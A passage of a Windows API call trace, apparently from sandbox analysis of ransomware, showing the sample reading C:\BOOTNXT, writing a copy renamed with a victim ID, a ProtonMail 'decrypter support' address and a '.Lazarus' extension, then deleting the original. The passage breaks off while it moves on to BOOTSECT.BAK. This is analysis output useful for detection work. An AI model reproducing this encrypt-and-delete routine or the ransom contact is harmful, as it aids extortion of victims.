(HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.653] AreFileApisANSI () returned 1 [0084.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\BOOTNXT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTNXT", lpUsedDefaultChar=0x0) returned 11 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.653] AreFileApisANSI () returned 1 [0084.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5cc20 [0084.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cc20, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.653] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.654] GetFileType (hFile=0x424) returned 0x1 [0084.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.654] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.654] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.654] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.655] CloseHandle (hObject=0x424) returned 1 [0084.655] AreFileApisANSI () returned 1 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5cb40 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cb40, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.655] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.655] GetFileType (hFile=0x424) returned 0x1 [0084.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.655] CloseHandle (hObject=0x424) returned 1 [0084.655] AreFileApisANSI () returned 1 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5c940 [0084.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5c940, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.655] GetFileAttributesExW (in: lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0084.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.655] AreFileApisANSI () returned 1 [0084.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.656] GetLastError () returned 0x0 [0084.656] SetLastError (dwErrCode=0x0) [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0084.656] GetLastError () returned 0x0 [0084.656] SetLastError (dwErrCode=0x0) [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68fe0 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0084.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0084.657] AreFileApisANSI () returned 1 [0084.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0084.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85bc0 [0084.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=73 | out: lpWideCharStr="C:\\BOOTNXT.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 73 [0084.657] CreateFileW (lpFileName="C:\\BOOTNXT.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\bootnxt.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.657] GetFileType (hFile=0x424) returned 0x1 [0084.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0084.657] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0084.658] AreFileApisANSI () returned 1 [0084.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5c940 [0084.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x5c940, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.658] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.658] GetFileType (hFile=0x364) returned 0x1 [0084.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.658] GetLastError () returned 0x0 [0084.658] SetLastError (dwErrCode=0x0) [0084.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.658] GetLastError () returned 0x0 [0084.658] SetLastError (dwErrCode=0x0) [0084.658] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.658] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0084.658] ReadFile (in: hFile=0x364, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f030*=0x1, lpOverlapped=0x0) returned 1 [0084.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0084.660] ReadFile (in: hFile=0x364, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0084.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0084.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1) returned 0x7d000 [0084.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0084.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0084.660] GetLastError () returned 0x0 [0084.660] SetLastError (dwErrCode=0x0) [0084.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0084.660] WriteFile (in: hFile=0x424, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x10, lpOverlapped=0x0) returned 1 [0084.661] GetLastError () returned 0x0 [0084.661] SetLastError (dwErrCode=0x0) [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.661] GetLastError () returned 0x0 [0084.661] SetLastError (dwErrCode=0x0) [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0084.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0084.662] CloseHandle (hObject=0x424) returned 1 [0084.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0084.663] CloseHandle (hObject=0x364) returned 1 [0084.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.663] AreFileApisANSI () returned 1 [0084.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5cc20 [0084.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x5cc20, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.664] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.664] GetLastError () returned 0x5 [0084.664] GetLastError () returned 0x5 [0084.664] SetLastError (dwErrCode=0x5) [0084.664] GetLastError () returned 0x5 [0084.664] SetLastError (dwErrCode=0x5) [0084.664] GetLastError () returned 0x5 [0084.664] SetLastError (dwErrCode=0x5) [0084.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.664] GetLastError () returned 0x5 [0084.664] SetLastError (dwErrCode=0x5) [0084.664] AreFileApisANSI () returned 1 [0084.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5cb40 [0084.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f734, cbMultiByte=-1, lpWideCharStr=0x5cb40, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0084.664] DeleteFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt")) returned 1 [0084.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.666] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x1, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.667] AreFileApisANSI () returned 1 [0084.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\BOOTSECT.BAK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 16 [0084.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0084.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.667] AreFileApisANSI () returned 1 [0084.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0084.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=16 | out: lpWideCharStr="C:\\BOOTSECT.BAK") returned 16 [0084.667] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.667] GetFileType (hFile=0x364) returned 0x1 [0084.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.667] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.668] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.668] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.668] CloseHandle (hObject=0x364) returned 1 [0084.668] AreFileApisANSI () returned 1 [0084.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0084.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=16 | out: lpWideCharStr="C:\\BOOTSECT.BAK") returned 16 [0084.668] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.668] GetLastError () returned 0x5 [0084.668] GetLastError () returned 0x5 [0084.668] SetLastError (dwErrCode=0x5) [0084.668] GetLastError () returned 0x5 [0084.668] SetLastError (dwErrCode=0x5) [0084.668] GetLastError () returned 0x5 [0084.668] SetLastError (dwErrCode=0x5) [0084.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.669] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, 